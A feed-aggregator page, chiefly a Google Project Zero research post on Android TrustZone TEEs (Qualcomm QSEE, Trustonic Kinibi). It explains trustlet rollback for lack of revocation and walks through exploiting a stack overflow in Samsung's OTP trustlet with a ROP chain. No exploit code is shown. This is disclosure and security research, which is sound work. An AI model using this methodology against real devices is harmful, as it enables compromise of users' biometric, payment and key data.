Feed aggregator

Building a Software Defined Cloud with Power Systems: A Guide to Building Software Defined Clouds with Power Systems

IBM Redbooks Site - Tue, 07/25/2017 - 09:30
Draft Redpaper, last updated: Tue, 25 Jul 2017

The aim of this document is to provide the reader with a concrete example and implementation details to build out a fully software defined cloud on Power systems.

Categories: Technology

Trust Issues: Exploiting TrustZone TEEs

Google Project Zero - Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness to this issue we will help push for a more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
*TOS: Trusted Operating System
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment is hinged upon the integrity of both its trusted applications, and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.  
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publically available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation. QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.


The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field is comprised of two concatenated values:

The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufactures, some of whom are also a part of my firmware collection. Nonetheless, all of these devices in my collection (including the Nexus 6) did not revoke the vulnerable trustlet, and as such have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been done regarding the amount of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is to place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as filtering the filesystem path from which trustlets are loaded to ensure that they only originate from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, it seems that filtering the filesystem path from which the trustlet is loaded is not feasible. This is since QSEECOM, the driver provided by Qualcomm to interact with QSEE, provides a simple API wherein it is only provided with a buffer containing the trustlet’s binary by user-space. This buffer is then passed on to TrustZone in order for the trustlet to be authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making such verification of the filesystem path harder.
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.


Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, additional capabilities are present in the case of trustlet revocation. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU is used to uniquely identify each trusted application, allowing for a more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices are either lacking a RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version TEE OS. This suggestion is not meritless, but is not robust either. For starters, this suggestion would require incrementing the version counter for the TEE OS’s image (otherwise attackers may rollback that binary as well). Therefore, this method suffers from some of the same drawbacks of the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution with the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos, that would suggest that whatever authentication code is present in one, is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation it taking place.
But that’s still not enough quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent version.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. Indeed, a very partial list of which includes the DRM server, system server, the volume daemon, mediaserver and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass on request to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version on Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.Deciding On A Target
To make matters more interesting, let’s try and identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version with the ones in the first version released for a specific device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary, and group together different firmware versions and devices that share the same signing key. After running this script it appears that both the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (therefore expanding the list of possible vulnerable trustlets that can be leveraged to attack the TEE).
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the the “CCM” trustlet (FFFFFFFF000000000000000000000012), revealed four added bound-checks which appear to be security-relevant.


Alternately, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
The issue we’re going to exploit is a simple stack-overflow. You might rightly assume that a stack overflow would be mitigated against by modern exploit mitigations. However, looking at the binary it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack alignment using which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execution-function” primitive.
Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server.Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.ASLR Kinibi offers no form of ASLR. In fact, all trustlets are loaded into a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, gadgets that invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped into a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, this means that any vulnerability found within a trustlet running under Trustonic’s TEE can therefore be exploited without requiring prior information about the address-space of the trustlet (thus lowering the bar for remotely exploitable bugs).
So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB in size. Since, as we’ve noted before, QSEE trustlets VAS consists of a flat mapping, this means that the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high entropy ASLR), the ASLR enabled by QSEE is limited approximately 9 bits (therefore with 355 guesses, an attacker would have a 50% chance of correctly guessing the base address). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack from the trustlet’s data segment, without providing any guard page inbetween. Furthermore, the stack is located at the end of the data segments, and global data structures are placed before it. This layout makes it ideal for an attacker to either overflow the stack into the globals, or vice-versa.
Identically, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, overflows in any of these data structures can be used to target any of the others.

TEEs As A High Value Target
At this point, it is probably clear enough that compromising TEEs on Android seems like a relatively straightforward task. Since both TEEs lag behind in term of exploit mitigations, it appears that the bar for exploitability of vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the number of trusted applications on the Galaxy S8, we can see that it contains no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
